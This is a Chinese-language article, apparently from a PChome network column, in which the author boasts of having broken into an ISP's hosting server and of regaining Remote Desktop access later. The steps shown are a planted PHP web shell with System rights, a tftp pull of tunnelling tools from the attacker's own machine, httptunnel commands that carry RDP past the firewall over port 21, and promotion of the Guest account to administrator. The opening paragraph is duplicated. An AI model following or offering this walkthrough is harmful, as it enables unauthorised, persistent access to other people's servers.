以前学习网页制作的时候,为了有个长期稳定且不受限制的空间,我花了一个星期的时间攻破了某家ISP的一台免费个人主页服务器,在接下来的日子里,我经常通过3389端口登录进去,不断地给它打补丁补漏洞,做一些管理和维护,自己也增长了很多知识。
以前学习网页制作的时候,为了有个长期稳定且不受限制的空间,我花了一个星期的时间攻破了某家ISP的一台免费个人主页服务器,在接下来的日子里,我经常通过3389端口登录进去,不断地给它打补丁补漏洞,做一些管理和维护,自己也增长了很多知识。
最近钻研网络安全技术,我又拿出Windows 2000终端服务客户端,想登上那台服务器,结果出现提示:“客户端无法连接终端服务器。服务器可能太忙,请以后再重新连接。”
试了几次都连接不上,赶忙用扫描工具扫描了一下,发现服务器居然只开放了21,80两个端口,怎么回事?管理员改变系统配置了?
看看我放的PHP Web Shell还在不在,这是我以前放在服务器上的,是System权限啊,打开cn.*****.com/door/scripts/info.php,我的马儿依然健在。
这让我很高兴,管理员应该没有重装系统。在PHP Web Shell命令框中输入netstat –an,点“执行”后,“输出”里有这么一条:“TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING”,说明终端服务并没有关闭,只是防火墙对外屏蔽了3389端口。管理员变聪明了,可这点小小的障碍怎么能难倒在黒客营摸爬滚打了多年的虫虫?既然你开放了21,80两个端口,我又有80端口的System权限的后门,那咱就从这里下手,通过TCP暗藏通道进去!
TCP暗藏通道(TCP Tunnel),是一种绕过防火墙端口屏蔽的通信方法,在本地把防火墙禁止通过的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对端通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包交送到相应的服务上。
能够实现TCP暗藏通道技术的工具现在有不少了,我用的是Httptunnelforwin。在我的机子上运行HTC的客户端:htc -F 3389 cn.*****.com:21,这样发给我机子的3389端口的数据都会经过HTC的“封装”处理之后,发给cn.*****.com的21端口。
通过PHP Web Shell ( 命令:tftp –I myip get [file] ),将Httptunnel的服务器端程序hts.exe和所需要的cygwin1.dll两个文件上传到服务器。然后运行Httptunnel的服务器,命令如下:hts -F localhost:3389 21,这样从21端口传来的数据经过hts的“解封”处理之后,转发给本地3389端口。
我这里之所以使用21端口而不使用80端口,是因为我有一个Web Shell,如果21端口出了问题,我可以在Shell中Kill掉进程!而使用80端口,万一出现意外的错误,我就没法处理了。
好了,利用PHP Web Shell激活Guest账号加入管理员组。在Windows
2000终端服务客户端填上服务器地址,等了比以前要长一点的时间,终于出现远程登录界面了!连上了,我又可以像使用自己的机子一样方便地使用服务器了!
更多权威的网络通信资讯,请点击进入 PChome网络中心
如果对本栏目有任何建议、意见或问题,或者有任何网络通信资讯、新闻、专题、专栏、活动、视频内容合作,欢迎点击 PChome网络中心联络页面 发邮件或致电021-64480216/7*222联系,惟冰会尽快给予回复,并且感谢大家对PChome网络中心一贯的关注和支持!
更多优惠,更多惊喜,请拨DELL免费电话800-858-2336
网友评论